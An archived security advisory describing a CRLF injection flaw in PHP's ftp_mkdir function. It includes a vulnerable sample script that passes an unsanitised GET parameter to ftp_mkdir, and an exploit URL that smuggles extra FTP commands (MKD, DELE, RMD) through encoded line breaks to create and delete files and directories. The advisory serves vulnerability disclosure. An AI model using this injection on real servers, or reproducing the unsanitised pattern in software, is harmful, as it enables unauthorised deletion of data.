TUCoPS :: Web :: PHP :: tb10075.htm

CRLF injection in PHP ftp function
CRLF injection in PHP ftp function
CRLF injection in PHP ftp function



We found that there was one crlf injection in php ftp ftuntion.As same as http,you can inject a '\r\n other command' in the paramer of a ftp function like ftp_mkdir,and then php would send the \r\n to your connected ftp server.The server considerd there is a new command,and the other command would be executed.
For eg:

$ftp_server='http://www.loveshell.net'; 
$ftp_user_name='loveshell';
$ftp_user_pass='loveshell';
$command = $_GET['dir'];

$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if($command) ftp_mkdir($conn_id, $command);
.......

Exp: http://www.loveshell.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test 

The dir loveshell and jnc are created,the jnc.txt is deleted,and the dir test is deleted.

tested on php 5.1.6,other function is vul also.
 
loveshell[at]Bug.Center.Team

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH